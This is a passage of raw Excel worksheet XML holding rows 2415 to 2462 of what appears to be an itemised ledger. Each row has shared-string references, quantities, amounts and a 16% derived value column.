      <c r="B2415" s="9">
        <v>2449</v>
      </c>
      <c r="C2415" s="238" t="s">
        <v>11424</v>
      </c>
      <c r="D2415" s="238" t="s">
        <v>11425</v>
      </c>
      <c r="E2415" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F2415" s="238" t="s">
        <v>11426</v>
      </c>
      <c r="G2415" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2415" s="10">
        <v>6</v>
      </c>
      <c r="I2415" s="14">
        <v>3263.55</v>
      </c>
      <c r="J2415" s="15">
        <v>522.1728</v>
      </c>
      <c r="K2415" s="16"/>
    </row>
    <row r="2416" spans="2:11">
      <c r="B2416" s="9">
        <v>2450</v>
      </c>
      <c r="C2416" s="238" t="s">
        <v>11427</v>
      </c>
      <c r="D2416" s="238" t="s">
        <v>11428</v>
      </c>
      <c r="E2416" s="238" t="s">
        <v>11429</v>
      </c>
      <c r="F2416" s="238" t="s">
        <v>11430</v>
      </c>
      <c r="G2416" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2416" s="10">
        <v>2</v>
      </c>
      <c r="I2416" s="14">
        <v>410.26</v>
      </c>
      <c r="J2416" s="15">
        <v>65.6416</v>
      </c>
      <c r="K2416" s="16"/>
    </row>
    <row r="2417" spans="2:11">
      <c r="B2417" s="9">
        <v>2451</v>
      </c>
      <c r="C2417" s="238" t="s">
        <v>11431</v>
      </c>
      <c r="D2417" s="238" t="s">
        <v>11432</v>
      </c>
      <c r="E2417" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2417" s="238" t="s">
        <v>11433</v>
      </c>
      <c r="G2417" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2417" s="10">
        <v>22</v>
      </c>
      <c r="I2417" s="14">
        <v>675.54</v>
      </c>
      <c r="J2417" s="15">
        <v>108.0992</v>
      </c>
      <c r="K2417" s="16"/>
    </row>
    <row r="2418" spans="2:11">
      <c r="B2418" s="9">
        <v>2452</v>
      </c>
      <c r="C2418" s="238" t="s">
        <v>11434</v>
      </c>
      <c r="D2418" s="238" t="s">
        <v>11435</v>
      </c>
      <c r="E2418" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2418" s="238" t="s">
        <v>11436</v>
      </c>
      <c r="G2418" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2418" s="10">
        <v>25</v>
      </c>
      <c r="I2418" s="14">
        <v>130.22</v>
      </c>
      <c r="J2418" s="15">
        <v>52.1</v>
      </c>
      <c r="K2418" s="16"/>
    </row>
    <row r="2419" spans="2:11">
      <c r="B2419" s="9">
        <v>2453</v>
      </c>
      <c r="C2419" s="238" t="s">
        <v>11437</v>
      </c>
      <c r="D2419" s="238" t="s">
        <v>11438</v>
      </c>
      <c r="E2419" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F2419" s="238" t="s">
        <v>11439</v>
      </c>
      <c r="G2419" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2419" s="10">
        <v>238</v>
      </c>
      <c r="I2419" s="14">
        <v>1889.65</v>
      </c>
      <c r="J2419" s="15">
        <v>755.888</v>
      </c>
      <c r="K2419" s="16"/>
    </row>
    <row r="2420" spans="2:11">
      <c r="B2420" s="9">
        <v>2454</v>
      </c>
      <c r="C2420" s="238" t="s">
        <v>11440</v>
      </c>
      <c r="D2420" s="238" t="s">
        <v>11441</v>
      </c>
      <c r="E2420" s="238" t="s">
        <v>6224</v>
      </c>
      <c r="F2420" s="238" t="s">
        <v>11442</v>
      </c>
      <c r="G2420" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2420" s="10">
        <v>3</v>
      </c>
      <c r="I2420" s="14">
        <v>1423.44</v>
      </c>
      <c r="J2420" s="15">
        <v>227.7504</v>
      </c>
      <c r="K2420" s="16"/>
    </row>
    <row r="2421" spans="2:11">
      <c r="B2421" s="9">
        <v>2455</v>
      </c>
      <c r="C2421" s="238" t="s">
        <v>11443</v>
      </c>
      <c r="D2421" s="238" t="s">
        <v>11444</v>
      </c>
      <c r="E2421" s="238" t="s">
        <v>10991</v>
      </c>
      <c r="F2421" s="238" t="s">
        <v>11445</v>
      </c>
      <c r="G2421" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2421" s="10">
        <v>1</v>
      </c>
      <c r="I2421" s="14">
        <v>2478.63</v>
      </c>
      <c r="J2421" s="15">
        <v>396.5808</v>
      </c>
      <c r="K2421" s="16"/>
    </row>
    <row r="2422" spans="2:11">
      <c r="B2422" s="9">
        <v>2456</v>
      </c>
      <c r="C2422" s="238" t="s">
        <v>11446</v>
      </c>
      <c r="D2422" s="238" t="s">
        <v>11447</v>
      </c>
      <c r="E2422" s="238" t="s">
        <v>11448</v>
      </c>
      <c r="F2422" s="9"/>
      <c r="G2422" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2422" s="10">
        <v>1</v>
      </c>
      <c r="I2422" s="14">
        <v>55.22</v>
      </c>
      <c r="J2422" s="15">
        <v>8.8352</v>
      </c>
      <c r="K2422" s="16"/>
    </row>
    <row r="2423" spans="2:11">
      <c r="B2423" s="9">
        <v>2457</v>
      </c>
      <c r="C2423" s="238" t="s">
        <v>11449</v>
      </c>
      <c r="D2423" s="238" t="s">
        <v>8367</v>
      </c>
      <c r="E2423" s="238" t="s">
        <v>8368</v>
      </c>
      <c r="F2423" s="238" t="s">
        <v>11450</v>
      </c>
      <c r="G2423" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H2423" s="10">
        <v>125</v>
      </c>
      <c r="I2423" s="14">
        <v>164529.97</v>
      </c>
      <c r="J2423" s="15">
        <v>26324.8</v>
      </c>
      <c r="K2423" s="16"/>
    </row>
    <row r="2424" spans="2:11">
      <c r="B2424" s="9">
        <v>2458</v>
      </c>
      <c r="C2424" s="238" t="s">
        <v>11451</v>
      </c>
      <c r="D2424" s="238" t="s">
        <v>8429</v>
      </c>
      <c r="E2424" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2424" s="238" t="s">
        <v>11452</v>
      </c>
      <c r="G2424" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2424" s="10">
        <v>6</v>
      </c>
      <c r="I2424" s="14">
        <v>1727.35</v>
      </c>
      <c r="J2424" s="15">
        <v>276.3744</v>
      </c>
      <c r="K2424" s="16"/>
    </row>
    <row r="2425" spans="2:11">
      <c r="B2425" s="9">
        <v>2459</v>
      </c>
      <c r="C2425" s="238" t="s">
        <v>11453</v>
      </c>
      <c r="D2425" s="238" t="s">
        <v>7389</v>
      </c>
      <c r="E2425" s="238" t="s">
        <v>7390</v>
      </c>
      <c r="F2425" s="9"/>
      <c r="G2425" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2425" s="10">
        <v>3</v>
      </c>
      <c r="I2425" s="14">
        <v>1.92</v>
      </c>
      <c r="J2425" s="15">
        <v>0.3072</v>
      </c>
      <c r="K2425" s="16"/>
    </row>
    <row r="2426" spans="2:11">
      <c r="B2426" s="9">
        <v>2460</v>
      </c>
      <c r="C2426" s="238" t="s">
        <v>11454</v>
      </c>
      <c r="D2426" s="238" t="s">
        <v>6706</v>
      </c>
      <c r="E2426" s="238" t="s">
        <v>6704</v>
      </c>
      <c r="F2426" s="9"/>
      <c r="G2426" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2426" s="10">
        <v>1</v>
      </c>
      <c r="I2426" s="14">
        <v>167.59</v>
      </c>
      <c r="J2426" s="15">
        <v>26.8144</v>
      </c>
      <c r="K2426" s="16"/>
    </row>
    <row r="2427" spans="2:11">
      <c r="B2427" s="9">
        <v>2461</v>
      </c>
      <c r="C2427" s="238" t="s">
        <v>11455</v>
      </c>
      <c r="D2427" s="238" t="s">
        <v>11456</v>
      </c>
      <c r="E2427" s="238" t="s">
        <v>11457</v>
      </c>
      <c r="F2427" s="238" t="s">
        <v>11458</v>
      </c>
      <c r="G2427" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2427" s="10">
        <v>1</v>
      </c>
      <c r="I2427" s="14">
        <v>321</v>
      </c>
      <c r="J2427" s="15">
        <v>51.36</v>
      </c>
      <c r="K2427" s="16"/>
    </row>
    <row r="2428" spans="2:11">
      <c r="B2428" s="9">
        <v>2462</v>
      </c>
      <c r="C2428" s="238" t="s">
        <v>11459</v>
      </c>
      <c r="D2428" s="238" t="s">
        <v>11460</v>
      </c>
      <c r="E2428" s="238" t="s">
        <v>11461</v>
      </c>
      <c r="F2428" s="238" t="s">
        <v>11462</v>
      </c>
      <c r="G2428" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2428" s="10">
        <v>1</v>
      </c>
      <c r="I2428" s="14">
        <v>400</v>
      </c>
      <c r="J2428" s="15">
        <v>64</v>
      </c>
      <c r="K2428" s="16"/>
    </row>
    <row r="2429" spans="2:11">
      <c r="B2429" s="9">
        <v>2463</v>
      </c>
      <c r="C2429" s="238" t="s">
        <v>11463</v>
      </c>
      <c r="D2429" s="238" t="s">
        <v>11464</v>
      </c>
      <c r="E2429" s="238" t="s">
        <v>11465</v>
      </c>
      <c r="F2429" s="238" t="s">
        <v>11466</v>
      </c>
      <c r="G2429" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2429" s="10">
        <v>2</v>
      </c>
      <c r="I2429" s="14">
        <v>2735.04</v>
      </c>
      <c r="J2429" s="15">
        <v>437.6064</v>
      </c>
      <c r="K2429" s="16"/>
    </row>
    <row r="2430" spans="2:11">
      <c r="B2430" s="9">
        <v>2464</v>
      </c>
      <c r="C2430" s="238" t="s">
        <v>11467</v>
      </c>
      <c r="D2430" s="238" t="s">
        <v>11468</v>
      </c>
      <c r="E2430" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2430" s="238" t="s">
        <v>11469</v>
      </c>
      <c r="G2430" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2430" s="10">
        <v>14</v>
      </c>
      <c r="I2430" s="14">
        <v>2996.87</v>
      </c>
      <c r="J2430" s="15">
        <v>479.4944</v>
      </c>
      <c r="K2430" s="16"/>
    </row>
    <row r="2431" spans="2:11">
      <c r="B2431" s="9">
        <v>2465</v>
      </c>
      <c r="C2431" s="238" t="s">
        <v>11470</v>
      </c>
      <c r="D2431" s="238" t="s">
        <v>11471</v>
      </c>
      <c r="E2431" s="238" t="s">
        <v>11472</v>
      </c>
      <c r="F2431" s="238" t="s">
        <v>11473</v>
      </c>
      <c r="G2431" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2431" s="10">
        <v>22</v>
      </c>
      <c r="I2431" s="14">
        <v>2957.8</v>
      </c>
      <c r="J2431" s="15">
        <v>473.264</v>
      </c>
      <c r="K2431" s="16"/>
    </row>
    <row r="2432" spans="2:11">
      <c r="B2432" s="9">
        <v>2466</v>
      </c>
      <c r="C2432" s="238" t="s">
        <v>11474</v>
      </c>
      <c r="D2432" s="238" t="s">
        <v>11475</v>
      </c>
      <c r="E2432" s="238" t="s">
        <v>11476</v>
      </c>
      <c r="F2432" s="238" t="s">
        <v>11477</v>
      </c>
      <c r="G2432" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2432" s="10">
        <v>2</v>
      </c>
      <c r="I2432" s="14">
        <v>52.31</v>
      </c>
      <c r="J2432" s="15">
        <v>8.3712</v>
      </c>
      <c r="K2432" s="16"/>
    </row>
    <row r="2433" spans="2:11">
      <c r="B2433" s="9">
        <v>2467</v>
      </c>
      <c r="C2433" s="238" t="s">
        <v>11478</v>
      </c>
      <c r="D2433" s="238" t="s">
        <v>11479</v>
      </c>
      <c r="E2433" s="238" t="s">
        <v>11480</v>
      </c>
      <c r="F2433" s="238" t="s">
        <v>11481</v>
      </c>
      <c r="G2433" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2433" s="10">
        <v>2</v>
      </c>
      <c r="I2433" s="14">
        <v>51</v>
      </c>
      <c r="J2433" s="15">
        <v>8.16</v>
      </c>
      <c r="K2433" s="16"/>
    </row>
    <row r="2434" spans="2:11">
      <c r="B2434" s="9">
        <v>2468</v>
      </c>
      <c r="C2434" s="238" t="s">
        <v>11482</v>
      </c>
      <c r="D2434" s="238" t="s">
        <v>11483</v>
      </c>
      <c r="E2434" s="238" t="s">
        <v>11388</v>
      </c>
      <c r="F2434" s="238" t="s">
        <v>11484</v>
      </c>
      <c r="G2434" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2434" s="10">
        <v>1</v>
      </c>
      <c r="I2434" s="14">
        <v>51.29</v>
      </c>
      <c r="J2434" s="15">
        <v>8.2064</v>
      </c>
      <c r="K2434" s="16"/>
    </row>
    <row r="2435" spans="2:11">
      <c r="B2435" s="9">
        <v>2469</v>
      </c>
      <c r="C2435" s="238" t="s">
        <v>11485</v>
      </c>
      <c r="D2435" s="238" t="s">
        <v>11486</v>
      </c>
      <c r="E2435" s="238" t="s">
        <v>10861</v>
      </c>
      <c r="F2435" s="9"/>
      <c r="G2435" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2435" s="10">
        <v>9</v>
      </c>
      <c r="I2435" s="14">
        <v>653.85</v>
      </c>
      <c r="J2435" s="15">
        <v>104.616</v>
      </c>
      <c r="K2435" s="16"/>
    </row>
    <row r="2436" spans="2:11">
      <c r="B2436" s="9">
        <v>2470</v>
      </c>
      <c r="C2436" s="238" t="s">
        <v>11487</v>
      </c>
      <c r="D2436" s="238" t="s">
        <v>11488</v>
      </c>
      <c r="E2436" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2436" s="238" t="s">
        <v>11489</v>
      </c>
      <c r="G2436" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2436" s="10">
        <v>1</v>
      </c>
      <c r="I2436" s="14">
        <v>113.33</v>
      </c>
      <c r="J2436" s="15">
        <v>18.1328</v>
      </c>
      <c r="K2436" s="16"/>
    </row>
    <row r="2437" spans="2:11">
      <c r="B2437" s="9">
        <v>2471</v>
      </c>
      <c r="C2437" s="238" t="s">
        <v>11490</v>
      </c>
      <c r="D2437" s="238" t="s">
        <v>11491</v>
      </c>
      <c r="E2437" s="238" t="s">
        <v>11492</v>
      </c>
      <c r="F2437" s="238" t="s">
        <v>11493</v>
      </c>
      <c r="G2437" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2437" s="10">
        <v>2</v>
      </c>
      <c r="I2437" s="14">
        <v>2339.32</v>
      </c>
      <c r="J2437" s="15">
        <v>374.2912</v>
      </c>
      <c r="K2437" s="16"/>
    </row>
    <row r="2438" spans="2:11">
      <c r="B2438" s="9">
        <v>2472</v>
      </c>
      <c r="C2438" s="238" t="s">
        <v>11494</v>
      </c>
      <c r="D2438" s="238" t="s">
        <v>11495</v>
      </c>
      <c r="E2438" s="238" t="s">
        <v>11496</v>
      </c>
      <c r="F2438" s="238" t="s">
        <v>11497</v>
      </c>
      <c r="G2438" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2438" s="10">
        <v>1</v>
      </c>
      <c r="I2438" s="14">
        <v>455.26</v>
      </c>
      <c r="J2438" s="15">
        <v>72.8416</v>
      </c>
      <c r="K2438" s="16"/>
    </row>
    <row r="2439" spans="2:11">
      <c r="B2439" s="9">
        <v>2473</v>
      </c>
      <c r="C2439" s="238" t="s">
        <v>11498</v>
      </c>
      <c r="D2439" s="238" t="s">
        <v>11499</v>
      </c>
      <c r="E2439" s="238" t="s">
        <v>11500</v>
      </c>
      <c r="F2439" s="9"/>
      <c r="G2439" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2439" s="10">
        <v>3000</v>
      </c>
      <c r="I2439" s="14">
        <v>6153.85</v>
      </c>
      <c r="J2439" s="15">
        <v>984</v>
      </c>
      <c r="K2439" s="16"/>
    </row>
    <row r="2440" spans="2:11">
      <c r="B2440" s="9">
        <v>2474</v>
      </c>
      <c r="C2440" s="238" t="s">
        <v>11501</v>
      </c>
      <c r="D2440" s="238" t="s">
        <v>11502</v>
      </c>
      <c r="E2440" s="238" t="s">
        <v>11503</v>
      </c>
      <c r="F2440" s="238" t="s">
        <v>11504</v>
      </c>
      <c r="G2440" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2440" s="10">
        <v>2</v>
      </c>
      <c r="I2440" s="14">
        <v>521.36</v>
      </c>
      <c r="J2440" s="15">
        <v>83.4176</v>
      </c>
      <c r="K2440" s="16"/>
    </row>
    <row r="2441" spans="2:11">
      <c r="B2441" s="9">
        <v>2475</v>
      </c>
      <c r="C2441" s="238" t="s">
        <v>11505</v>
      </c>
      <c r="D2441" s="238" t="s">
        <v>11506</v>
      </c>
      <c r="E2441" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2441" s="238" t="s">
        <v>11507</v>
      </c>
      <c r="G2441" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2441" s="10">
        <v>10</v>
      </c>
      <c r="I2441" s="14">
        <v>85.47</v>
      </c>
      <c r="J2441" s="15">
        <v>13.68</v>
      </c>
      <c r="K2441" s="16"/>
    </row>
    <row r="2442" spans="2:11">
      <c r="B2442" s="9">
        <v>2476</v>
      </c>
      <c r="C2442" s="238" t="s">
        <v>11508</v>
      </c>
      <c r="D2442" s="238" t="s">
        <v>11509</v>
      </c>
      <c r="E2442" s="238" t="s">
        <v>6586</v>
      </c>
      <c r="F2442" s="238" t="s">
        <v>11510</v>
      </c>
      <c r="G2442" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2442" s="10">
        <v>1</v>
      </c>
      <c r="I2442" s="14">
        <v>1173.16</v>
      </c>
      <c r="J2442" s="15">
        <v>187.7056</v>
      </c>
      <c r="K2442" s="16"/>
    </row>
    <row r="2443" spans="2:11">
      <c r="B2443" s="9">
        <v>2477</v>
      </c>
      <c r="C2443" s="238" t="s">
        <v>11511</v>
      </c>
      <c r="D2443" s="238" t="s">
        <v>11512</v>
      </c>
      <c r="E2443" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F2443" s="238" t="s">
        <v>11513</v>
      </c>
      <c r="G2443" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2443" s="10">
        <v>1</v>
      </c>
      <c r="I2443" s="14">
        <v>495.73</v>
      </c>
      <c r="J2443" s="15">
        <v>198.292</v>
      </c>
      <c r="K2443" s="16"/>
    </row>
    <row r="2444" spans="2:11">
      <c r="B2444" s="9">
        <v>2478</v>
      </c>
      <c r="C2444" s="238" t="s">
        <v>11514</v>
      </c>
      <c r="D2444" s="238" t="s">
        <v>11515</v>
      </c>
      <c r="E2444" s="238" t="s">
        <v>4952</v>
      </c>
      <c r="F2444" s="238" t="s">
        <v>11516</v>
      </c>
      <c r="G2444" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2444" s="10">
        <v>1</v>
      </c>
      <c r="I2444" s="14">
        <v>42.74</v>
      </c>
      <c r="J2444" s="15">
        <v>6.8384</v>
      </c>
      <c r="K2444" s="16"/>
    </row>
    <row r="2445" spans="2:11">
      <c r="B2445" s="9">
        <v>2479</v>
      </c>
      <c r="C2445" s="238" t="s">
        <v>11517</v>
      </c>
      <c r="D2445" s="238" t="s">
        <v>11518</v>
      </c>
      <c r="E2445" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F2445" s="238" t="s">
        <v>11519</v>
      </c>
      <c r="G2445" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2445" s="10">
        <v>1</v>
      </c>
      <c r="I2445" s="14">
        <v>34.19</v>
      </c>
      <c r="J2445" s="15">
        <v>5.4704</v>
      </c>
      <c r="K2445" s="16"/>
    </row>
    <row r="2446" spans="2:11">
      <c r="B2446" s="9">
        <v>2480</v>
      </c>
      <c r="C2446" s="238" t="s">
        <v>11520</v>
      </c>
      <c r="D2446" s="238" t="s">
        <v>11521</v>
      </c>
      <c r="E2446" s="238" t="s">
        <v>9289</v>
      </c>
      <c r="F2446" s="238" t="s">
        <v>11522</v>
      </c>
      <c r="G2446" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2446" s="10">
        <v>1</v>
      </c>
      <c r="I2446" s="14">
        <v>341.9</v>
      </c>
      <c r="J2446" s="15">
        <v>54.704</v>
      </c>
      <c r="K2446" s="16"/>
    </row>
    <row r="2447" spans="2:11">
      <c r="B2447" s="9">
        <v>2481</v>
      </c>
      <c r="C2447" s="238" t="s">
        <v>11523</v>
      </c>
      <c r="D2447" s="238" t="s">
        <v>11524</v>
      </c>
      <c r="E2447" s="238" t="s">
        <v>7939</v>
      </c>
      <c r="F2447" s="238" t="s">
        <v>3004</v>
      </c>
      <c r="G2447" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2447" s="10">
        <v>1</v>
      </c>
      <c r="I2447" s="14">
        <v>6640.35</v>
      </c>
      <c r="J2447" s="15">
        <v>1062.456</v>
      </c>
      <c r="K2447" s="16"/>
    </row>
    <row r="2448" spans="2:11">
      <c r="B2448" s="9">
        <v>2482</v>
      </c>
      <c r="C2448" s="238" t="s">
        <v>11525</v>
      </c>
      <c r="D2448" s="238" t="s">
        <v>4921</v>
      </c>
      <c r="E2448" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2448" s="9"/>
      <c r="G2448" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2448" s="10">
        <v>1</v>
      </c>
      <c r="I2448" s="14">
        <v>31.69</v>
      </c>
      <c r="J2448" s="15">
        <v>5.0704</v>
      </c>
      <c r="K2448" s="16"/>
    </row>
    <row r="2449" spans="2:11">
      <c r="B2449" s="9">
        <v>2483</v>
      </c>
      <c r="C2449" s="238" t="s">
        <v>11526</v>
      </c>
      <c r="D2449" s="238" t="s">
        <v>11527</v>
      </c>
      <c r="E2449" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F2449" s="238" t="s">
        <v>11528</v>
      </c>
      <c r="G2449" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2449" s="10">
        <v>50</v>
      </c>
      <c r="I2449" s="14">
        <v>119.64</v>
      </c>
      <c r="J2449" s="15">
        <v>19.12</v>
      </c>
      <c r="K2449" s="16"/>
    </row>
    <row r="2450" spans="2:11">
      <c r="B2450" s="9">
        <v>2484</v>
      </c>
      <c r="C2450" s="238" t="s">
        <v>11529</v>
      </c>
      <c r="D2450" s="238" t="s">
        <v>11530</v>
      </c>
      <c r="E2450" s="238" t="s">
        <v>11531</v>
      </c>
      <c r="F2450" s="238" t="s">
        <v>11532</v>
      </c>
      <c r="G2450" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2450" s="10">
        <v>10</v>
      </c>
      <c r="I2450" s="14">
        <v>855.58</v>
      </c>
      <c r="J2450" s="15">
        <v>136.896</v>
      </c>
      <c r="K2450" s="16"/>
    </row>
    <row r="2451" spans="2:11">
      <c r="B2451" s="9">
        <v>2485</v>
      </c>
      <c r="C2451" s="238" t="s">
        <v>11533</v>
      </c>
      <c r="D2451" s="238" t="s">
        <v>11534</v>
      </c>
      <c r="E2451" s="238" t="s">
        <v>11535</v>
      </c>
      <c r="F2451" s="238" t="s">
        <v>11536</v>
      </c>
      <c r="G2451" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2451" s="10">
        <v>2</v>
      </c>
      <c r="I2451" s="14">
        <v>461.54</v>
      </c>
      <c r="J2451" s="15">
        <v>73.8464</v>
      </c>
      <c r="K2451" s="16"/>
    </row>
    <row r="2452" spans="2:11">
      <c r="B2452" s="9">
        <v>2486</v>
      </c>
      <c r="C2452" s="238" t="s">
        <v>11537</v>
      </c>
      <c r="D2452" s="238" t="s">
        <v>11538</v>
      </c>
      <c r="E2452" s="238" t="s">
        <v>11539</v>
      </c>
      <c r="F2452" s="238" t="s">
        <v>11540</v>
      </c>
      <c r="G2452" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2452" s="10">
        <v>1</v>
      </c>
      <c r="I2452" s="14">
        <v>230.77</v>
      </c>
      <c r="J2452" s="15">
        <v>36.9232</v>
      </c>
      <c r="K2452" s="16"/>
    </row>
    <row r="2453" spans="2:11">
      <c r="B2453" s="9">
        <v>2487</v>
      </c>
      <c r="C2453" s="238" t="s">
        <v>11541</v>
      </c>
      <c r="D2453" s="238" t="s">
        <v>11542</v>
      </c>
      <c r="E2453" s="238" t="s">
        <v>11543</v>
      </c>
      <c r="F2453" s="238" t="s">
        <v>11544</v>
      </c>
      <c r="G2453" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2453" s="10">
        <v>1</v>
      </c>
      <c r="I2453" s="14">
        <v>1282.1</v>
      </c>
      <c r="J2453" s="15">
        <v>205.136</v>
      </c>
      <c r="K2453" s="16"/>
    </row>
    <row r="2454" spans="2:11">
      <c r="B2454" s="9">
        <v>2488</v>
      </c>
      <c r="C2454" s="238" t="s">
        <v>11545</v>
      </c>
      <c r="D2454" s="238" t="s">
        <v>11546</v>
      </c>
      <c r="E2454" s="238" t="s">
        <v>11547</v>
      </c>
      <c r="F2454" s="238" t="s">
        <v>11548</v>
      </c>
      <c r="G2454" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2454" s="10">
        <v>9</v>
      </c>
      <c r="I2454" s="14">
        <v>346.16</v>
      </c>
      <c r="J2454" s="15">
        <v>55.3824</v>
      </c>
      <c r="K2454" s="16"/>
    </row>
    <row r="2455" spans="2:11">
      <c r="B2455" s="9">
        <v>2489</v>
      </c>
      <c r="C2455" s="238" t="s">
        <v>11549</v>
      </c>
      <c r="D2455" s="238" t="s">
        <v>11550</v>
      </c>
      <c r="E2455" s="238" t="s">
        <v>11551</v>
      </c>
      <c r="F2455" s="238" t="s">
        <v>11552</v>
      </c>
      <c r="G2455" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2455" s="10">
        <v>7</v>
      </c>
      <c r="I2455" s="14">
        <v>474.35</v>
      </c>
      <c r="J2455" s="15">
        <v>75.8912</v>
      </c>
      <c r="K2455" s="16"/>
    </row>
    <row r="2456" spans="2:11">
      <c r="B2456" s="9">
        <v>2490</v>
      </c>
      <c r="C2456" s="238" t="s">
        <v>11553</v>
      </c>
      <c r="D2456" s="238" t="s">
        <v>11554</v>
      </c>
      <c r="E2456" s="238" t="s">
        <v>11555</v>
      </c>
      <c r="F2456" s="238" t="s">
        <v>11556</v>
      </c>
      <c r="G2456" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2456" s="10">
        <v>5</v>
      </c>
      <c r="I2456" s="14">
        <v>12559.35</v>
      </c>
      <c r="J2456" s="15">
        <v>2009.496</v>
      </c>
      <c r="K2456" s="16"/>
    </row>
    <row r="2457" spans="2:11">
      <c r="B2457" s="9">
        <v>2491</v>
      </c>
      <c r="C2457" s="238" t="s">
        <v>11557</v>
      </c>
      <c r="D2457" s="238" t="s">
        <v>6478</v>
      </c>
      <c r="E2457" s="238" t="s">
        <v>11555</v>
      </c>
      <c r="F2457" s="238" t="s">
        <v>11558</v>
      </c>
      <c r="G2457" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2457" s="10">
        <v>2</v>
      </c>
      <c r="I2457" s="14">
        <v>3247.87</v>
      </c>
      <c r="J2457" s="15">
        <v>519.6608</v>
      </c>
      <c r="K2457" s="16"/>
    </row>
    <row r="2458" spans="2:11">
      <c r="B2458" s="9">
        <v>2492</v>
      </c>
      <c r="C2458" s="238" t="s">
        <v>11559</v>
      </c>
      <c r="D2458" s="238" t="s">
        <v>11560</v>
      </c>
      <c r="E2458" s="238" t="s">
        <v>11555</v>
      </c>
      <c r="F2458" s="238" t="s">
        <v>11561</v>
      </c>
      <c r="G2458" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2458" s="10">
        <v>4</v>
      </c>
      <c r="I2458" s="14">
        <v>4964.1</v>
      </c>
      <c r="J2458" s="15">
        <v>794.2592</v>
      </c>
      <c r="K2458" s="16"/>
    </row>
    <row r="2459" spans="2:11">
      <c r="B2459" s="9">
        <v>2493</v>
      </c>
      <c r="C2459" s="238" t="s">
        <v>11562</v>
      </c>
      <c r="D2459" s="238" t="s">
        <v>11563</v>
      </c>
      <c r="E2459" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F2459" s="238" t="s">
        <v>11564</v>
      </c>
      <c r="G2459" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2459" s="10">
        <v>21</v>
      </c>
      <c r="I2459" s="14">
        <v>574.36</v>
      </c>
      <c r="J2459" s="15">
        <v>91.896</v>
      </c>
      <c r="K2459" s="16"/>
    </row>
    <row r="2460" spans="2:11">
      <c r="B2460" s="9">
        <v>2494</v>
      </c>
      <c r="C2460" s="238" t="s">
        <v>11565</v>
      </c>
      <c r="D2460" s="238" t="s">
        <v>11566</v>
      </c>
      <c r="E2460" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F2460" s="238" t="s">
        <v>11567</v>
      </c>
      <c r="G2460" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2460" s="10">
        <v>50</v>
      </c>
      <c r="I2460" s="14">
        <v>9829.06</v>
      </c>
      <c r="J2460" s="15">
        <v>1572.64</v>
      </c>
      <c r="K2460" s="16"/>
    </row>
    <row r="2461" spans="2:11">
      <c r="B2461" s="9">
        <v>2495</v>
      </c>
      <c r="C2461" s="238" t="s">
        <v>11568</v>
      </c>
      <c r="D2461" s="238" t="s">
        <v>11569</v>
      </c>
      <c r="E2461" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2461" s="238" t="s">
        <v>11570</v>
      </c>
      <c r="G2461" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H2461" s="10">
        <v>37</v>
      </c>
      <c r="I2461" s="14">
        <v>7458.99</v>
      </c>
      <c r="J2461" s="15">
        <v>1193.4128</v>
      </c>
      <c r="K2461" s="16"/>
    </row>
    <row r="2462" spans="2:11">
      <c r="B2462" s="9">
        <v>2496</v>
      </c>
      <c r="C2462" s="238" t="s">
        <v>11571</v>
      </c>
      <c r="D2462" s="238" t="s">
        <v>11572</v>
      </c>
